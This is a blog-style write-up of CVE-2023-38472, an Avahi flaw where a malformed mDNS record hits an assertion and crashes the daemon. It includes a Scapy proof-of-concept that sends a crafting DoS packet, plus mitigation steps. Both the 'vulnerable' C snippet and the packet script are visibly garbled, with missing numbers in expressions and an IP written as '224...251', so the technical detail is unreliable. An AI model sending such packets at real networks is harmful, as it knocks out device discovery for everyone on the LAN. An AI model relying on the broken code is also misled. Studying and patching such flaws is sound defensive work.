CVE-2023-38472 - Exploiting the Avahi avahi_rdata_parse() Reachable Assertion Vulnerability
If you’re managing Linux systems or networked devices, you’ve probably come across Avahi. Avahi is the go-to open source implementation for Zeroconf and mDNS/DNS-SD — basically, it helps devices on a local network discover each other without manual setup. But in 2023, security researchers found a serious issue in Avahi that’s easy to overlook but dangerous if left unpatched. This vulnerability — assigned CVE-2023-38472 — is about a reachable assertion in the avahi_rdata_parse() function. This post gives you an exclusive look at what this means, how the exploit works, and how to stay safe.
What Is CVE-2023-38472?
CVE-2023-38472 is a security bug in Avahi (the exact versions affected vary: see here). The bug sits in the function avahi_rdata_parse(), which parses Resource Record data from DNS packets. The flaw is that Avahi doesn’t always validate incoming data thoroughly. Specifically, an attacker can send crafted packets that trigger an assertion failure. When that happens, Avahi crashes, which could be used to DoS (deny service to) a local network.
Component: Avahi daemon
- CVE: CVE-2023-38472
The Vulnerable Code
Let’s look at what’s going on behind the scenes. The code in question is in avahi-core/rdata.c, namely the avahi_rdata_parse() function. Here’s a simplified snippet (for educational purposes):
int avahi_rdata_parse(const void *rdata, size_t size) {
AvahiRData data;
assert(rdata); // makes sure rdata isn't null
assert(size > && size < MAX_SIZE);
// Parsing logic...
if (size < EXPECTED_LEN) {
assert( && "rdata size too small");
}
// ... more code ...
return ;
}
The problem: If size doesn’t match what’s expected, the code hits an assert that stops the daemon cold.
You can trigger the bug with a single malformed DNS packet on the local network
from scapy.all import *
# This packet crafts a DNS response with malformed rdata size
packet = (
Ether(dst="ff:ff:ff:ff:ff:ff") /
IP(dst="224...251") /
UDP(sport=5353, dport=5353) /
DNS(
qr=1,
qdcount=1,
ancount=1,
qd=DNSQR(qname="bad.local", qtype="A"),
an=DNSRR(rrname="bad.local", rdata="A"*2) # too-short rdata
)
)
sendp(packet, iface="eth")
*Replace "eth" with the interface on your machine.*
When your Avahi service on the same network parses this packet, it triggers the assert and crashes.
Why Is This Dangerous?
- Denial of Service: The most immediate risk is that Avahi will crash and stop announcing services on the LAN. If your network relies on mDNS for device discovery, printers, file shares, etc., those will break until you restart the daemon.
- Unprivileged Attacker: Since mDNS is a local-network protocol, anyone on the Wi-Fi or LAN can send bad data.
- Wormable Potential: In certain setups, an automated attack could bring down every Avahi-enabled device on a whole network with a single script.
How to Fix and Protect
1. Update Avahi: The developers released patches to validate the data more carefully and prevent assertion crashes. Most major Linux distributions pushed security updates:
- Debian fix
- Upstream GitHub patch
2. Segment Your Network: Don’t let untrusted users join the same LAN or Wi-Fi as your infrastructure devices.
3. Turn Off Avahi If Not Needed: On Debian/Ubuntu, run sudo systemctl disable --now avahi-daemon.
4. Monitor Crashes: If you see Avahi dying or being restarted, check your logs for suspicious mDNS traffic.
References
- National Vulnerability Database (NVD): CVE-2023-38472
- Debian Security Tracker
- Avahi GitHub Commit (fix patch)
- Avahi Homepage
In Summary
CVE-2023-38472 is a prime example of how even little oversights can lead to serious network headaches. All it takes is a sneaky little packet to bring a whole discovery service down. Make sure your systems are patched, and keep an eye on mDNS traffic. It’s one more reminder: “low-level” open source tools deserve our security attention too.
Timeline
Published on: 11/02/2023 15:15:08 UTC
Last modified on: 11/09/2023 19:58:11 UTC